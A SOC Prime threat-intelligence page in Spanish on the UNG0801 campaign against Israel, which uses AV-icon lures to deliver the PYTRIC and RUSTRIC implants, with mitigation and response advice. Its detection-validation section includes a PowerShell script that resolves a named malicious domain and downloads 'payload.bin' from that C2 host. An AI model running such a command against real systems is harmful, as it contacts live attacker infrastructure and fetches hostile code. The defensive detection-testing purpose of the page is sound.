SOC Prime Bias: Crítico

30 Dec 2025 13:40 UTC

UNG0801: Actividad Amenazante Dirigida a Israel Impulsada por Suplantación de Iconos de AV

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
UNG0801: Actividad Amenazante Dirigida a Israel Impulsada por Suplantación de Iconos de AV
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El informe describe dos campañas conectadas que utilizan documentos PDF y Word maliciosos para entregar cargas útiles que imitan íconos de antivirus y atacan a organizaciones israelíes. Una vía deja caer PYTRIC, un implante de Python empaquetado con PyInstaller, mientras que la otra entrega RUSTRIC, un implante basado en Rust lanzado mediante un documento de Word con macros habilitadas. Ambas cargas útiles recopilan detalles del host, ejecutan comandos del sistema y evalúan el software de seguridad instalado; PYTRIC además incluye funcionalidades destructivas. La entrega está impulsada por adjuntos de phishing dirigido y enlaces alojados en la nube (incluido Dropbox), con Telegram utilizado para mando y control.

Investigación

SEQRITE Labs analizó los señuelos iniciales de phishing, extrajo macros embebidas y reconstruyó la cadena de carga útil dejada. Se confirmó que PYTRIC es un paquete PyInstaller con rutinas de descubrimiento y eliminación de archivos, y los analistas observaron credenciales de bot de Telegram asociadas con Backup2040. RUSTRIC fue perfilado como un binario Rust que verifica veintiocho productos antivirus y activa una carga útil codificada en hexadecimal usando WMI. El análisis de infraestructura conectó la entrega a un enlace de Dropbox y un dominio que resuelve a una dirección IP previamente vinculada a netvigil.org.

Mitigación

Capacite a los usuarios para tratar con precaución los adjuntos de PDF y Word no solicitados, especialmente los archivos presentados como herramientas de seguridad o utilidades relacionadas con AV. Configure la seguridad del correo electrónico para bloquear documentos con macros y para marcar o restringir las URL que apuntan a hosts de almacenamiento en la nube usados para la entrega de cargas útiles. En los endpoints, monitoree la ejecución de PyInstaller, la creación de procesos WMI inusuales y la invocación sospechosa de utilidades integradas como whoami, hostname y nslookup. Bloquear dominios e IPs maliciosas identificadas puede interrumpir aún más la ruta de infección.

Respuesta

Si se detecta actividad, aísle el sistema afectado, preserve los datos volátiles y recoja los documentos maliciosos para una evaluación inicial basada en hashes. Detenga cualquier proceso generado por WMI sospechoso y elimine las cargas útiles dejadas en ubicaciones comunes de preparación como la carpeta de Descargas. Realice una validación forense para actividades de eliminación o borrado de archivos, restablezca credenciales potencialmente expuestas y monitoree comunicaciones de C2 mediante Telegram.

Flujo de Ataque

Ejecución de Simulación

Prerequisito: La verificación previa de telemetría y línea base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y tienen como objetivo generar la telemetría exacta que espera la lógica de detección. Los ejemplos abstractos o no relacionados llevarán a un diagnóstico incorrecto.

  • Narrativa del Ataque y Comandos:
    El adversario ha pre-registrado el dominio stratioai.org y lo ha configurado para resolver a 159.198.68.25 (un VPS comprometido). Usando una línea única de PowerShell, inician un beacon C2 que descarga una pequeña carga útil y luego mantiene un shell inverso persistente. La conexión saliente se realiza a través de HTTPS (puerto 443) para mezclarse con el tráfico normal, pero el firewall registra la IP de destino y la consulta DNS, satisfaciendo la regla sigma.

  • Guión de Prueba de Regresión:

    # -------------------------------------------------
    # Beacon C2 simulado para validación de detección
    # -------------------------------------------------
    # 1. Resolver el dominio malicioso (fuerza una consulta DNS)
    $maliciousDomain = "stratioai.org"
    $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain)
    Write-Host "Resolved $maliciousDomain to $($resolved -join ', ')"
    
    # 2. Establecer conexión HTTPS con la IP maliciosa (C2)
    $maliciousIP = "159.198.68.25"
    $url = "https://$maliciousDomain/payload.bin"
    
    try {
        $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10
        Write-Host "C2 request succeeded, size: $($response.ContentLength) bytes"
    } catch {
        Write-Error "C2 request failed: $_"
    }
    
    # 3. OPCIONAL: Mantener el canal vivo por 30 segundos
    Start-Sleep -Seconds 30
    # -------------------------------------------------
  • Comandos de Limpieza:

    # Eliminar cualquier archivo temporal (ninguno creado en este guión)
    # Borrar la caché DNS para evitar reutilización accidental
    ipconfig /flushdns
    Write-Host "Limpieza completa."